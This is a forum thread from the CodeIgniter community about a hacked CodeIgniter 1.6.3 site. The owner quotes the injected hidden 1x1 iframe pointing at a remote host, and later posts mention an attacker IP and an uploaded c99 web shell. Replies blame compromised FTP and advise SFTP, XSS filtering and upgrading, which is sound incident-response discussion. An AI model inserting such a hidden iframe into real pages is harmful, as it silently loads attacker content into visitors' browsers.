• 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
hacked again .. iframe injection CI 1.6.3 !!

#1
[eluser]Unknown[/eluser]
Hello everyone. My customer running a website developed in CI version 1.6.3. Recently the website got massive iframe injection.

Code:
<iframe heigth="1" width="1" frameborder="0" src="http://curem.net/t.php?id=2230488"></iframe>

All the php files are injected with, new index.html files are created in each directory. Despite my shouts, developers failed to enable $config['global_xss_filtering'] = false; to true. Could that what have prevented with this situation?

Where should I start to find the root cause where the injection started?

Thanks

#2
[eluser]davidbehler[/eluser]
Hacked ftp access?

#3
[eluser]Unknown[/eluser]
[quote author="waldmeister" date="1298820387"]Hacked ftp access?[/quote]

Yes, it looks like it. Here is the gentleman .. 213.246.45.102. Later on c99 was uploaded and the DB was compromised.

#4
[eluser]Phil Sturgeon[/eluser]
Disable FTP and use SFTP or start SSHing your code online with rsync or Git.

While you're at it, enable XSS protection and upgrade to CodeIgniter 1.7.3 at least (will be an easier jump than going to 2.0).

That should take care of your security concerns.


Digg   Delicious   Reddit   Facebook   Twitter   StumbleUpon  


  Theme © 2014 iAndrew  
Powered By MyBB, © 2002-2020 MyBB Group.